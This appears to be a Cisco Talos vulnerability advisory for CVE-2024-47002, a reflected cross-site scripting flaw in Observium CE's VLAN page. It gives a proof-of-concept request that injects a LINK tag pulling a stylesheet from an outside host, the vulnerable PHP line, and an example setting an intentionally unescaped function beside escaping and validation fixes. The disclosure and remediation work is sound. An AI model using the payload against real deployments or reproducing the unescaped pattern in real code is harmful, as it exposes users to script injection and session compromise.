CVE-2024-47002
An HTML code injection vulnerability exists in the VLAN management part of Observium CE 24.4.13528. A specially crafted HTTP request can lead to arbitrary HTML code being injected into the page. An authenticated user would need to click a malicious link provided by the attacker.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Observium CE 24.4.13528
Observium - https://www.observium.org/
8.7 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Observium is a web-based network monitoring platform designed for network performance monitoring, infrastructure health management, and alerting. It provides automatic discovery of network devices, and supports a wide range of hardware and software platforms, including routers, switches, servers, and applications.
A reflected cross-site scripting vulnerability exists in the vlan functionality: by setting a crafted value of the vlan_id parameter, an attacker is able to inject arbitrary HTML code into the web page.
To trigger this vulnerability, an attacker needs to force the victim's browser to send the following HTTP request:
Decoded URL
http://192.168.0.40/vlan/?vlan_id=<LINK REL="stylesheet" HREF="http://192.168.0.140:8000/very_evil.css">
Request
GET /vlan/?vlan_id=%3CLINK%20REL%3d%22stylesheet%22%20HREF%3d%22http%3a%2f%2f192.168.0.140%3a8000%2fvery_evil.css%22%3E HTTP/1.1
Host: 192.168.0.40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wmeditor=0%3A0%3A0; OBSID=r6vhgucaevg38nhhv05gl94ddg; observium_screen_ratio=1; observium_screen_resolution=2560x1440; screen_scheme=light
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Response
HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 14:47:28 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 34024
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<table class="table table-hover table-striped vertical-align">
<tbody>
<tr class="up">
<td class="state-marker"></td>
<td style="padding: 10px 14px;"><span style="font-size: 20px; color: #193d7f;">VLAN <LINK REL="stylesheet" HREF="http://192.168.0.140:8000/very_evil.css"></span>
</td>
The vulnerable code is located in html/pages/vlan.inc.php:
<table class="table table-hover table-striped vertical-align">
<tbody>
<tr class="up">
<td class="state-marker"></td>
<td style="padding: 10px 14px;"><span style="font-size: 20px; color: #193d7f;">VLAN ' . $vars['vlan_id'] . '</span>
</td>
<td>
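The following PHP is an added example written for this advisory; it is not Observium's code and the function names are this example's own. It places the vulnerable concatenation pattern from vlan.inc.php beside two fixes a maintainer would apply: context-aware output encoding with htmlspecialchars(), and input validation that only accepts an integer VLAN ID in the IEEE 802.1Q range 1-4094 before the value ever reaches the template. The payload string is the decoded one from the advisory, embedded as constructed sample input so the script runs offline.

```php
<?php
// Added example, not Observium's code. Shows the CWE-79 defect in
// html/pages/vlan.inc.php (raw $vars['vlan_id'] echoed into markup)
// next to an output-encoding fix and an input-validation fix.

// Constructed sample input: the decoded payload from the advisory.
$payload = '<LINK REL="stylesheet" HREF="http://192.168.0.140:8000/very_evil.css">';

// 1. Vulnerable pattern: the request parameter is concatenated straight
//    into HTML, so any tag in vlan_id is reflected to the browser as-is.
function render_vlan_vulnerable(array $vars): string
{
    return '<span style="font-size: 20px; color: #193d7f;">VLAN '
        . $vars['vlan_id'] . '</span>';
}

// 2. Output encoding: escape for the HTML text context at the point of
//    output. ENT_QUOTES also covers attribute contexts; the explicit
//    charset avoids encoding-dependent bypasses.
function render_vlan_escaped(array $vars): string
{
    $safe = htmlspecialchars((string) ($vars['vlan_id'] ?? ''),
        ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<span style="font-size: 20px; color: #193d7f;">VLAN '
        . $safe . '</span>';
}

// 3. Input validation: a VLAN ID is an integer in 1..4094 (802.1Q reserves
//    0 and 4095), so anything else is rejected before rendering. Returns
//    null for invalid input so the caller can respond with an error page.
function validate_vlan_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 4094],
    ]);
    return $id === false ? null : $id;
}

// Renders only after validation; the escape is kept as defence in depth.
function render_vlan_hardened(array $vars): string
{
    $id = validate_vlan_id($vars['vlan_id'] ?? null);
    if ($id === null) {
        return '<p class="text-danger">Invalid VLAN ID</p>';
    }
    return render_vlan_escaped(['vlan_id' => $id]);
}

// Driver: compare the three renderings for the payload and a valid ID.
foreach ([$payload, '100'] as $input) {
    $vars = ['vlan_id' => $input];
    echo "input: " . $input . PHP_EOL;
    echo "  vulnerable: " . render_vlan_vulnerable($vars) . PHP_EOL;
    echo "  escaped:    " . render_vlan_escaped($vars) . PHP_EOL;
    echo "  hardened:   " . render_vlan_hardened($vars) . PHP_EOL;
}
```

Running the script shows the vulnerable variant emitting the raw LINK tag, the escaped variant emitting it as inert `&lt;LINK ...&gt;` text, and the hardened variant refusing the payload outright while still rendering "VLAN 100" for a legitimate ID. Validation alone is the tighter fix for a numeric parameter; output encoding is what closes the class of bug wherever a free-form value is reflected.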
2024-10-23 - Initial Vendor Contact
2024-10-23 - Vendor Disclosure
2024-12-24 - Vendor Patch Release
2025-01-15 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.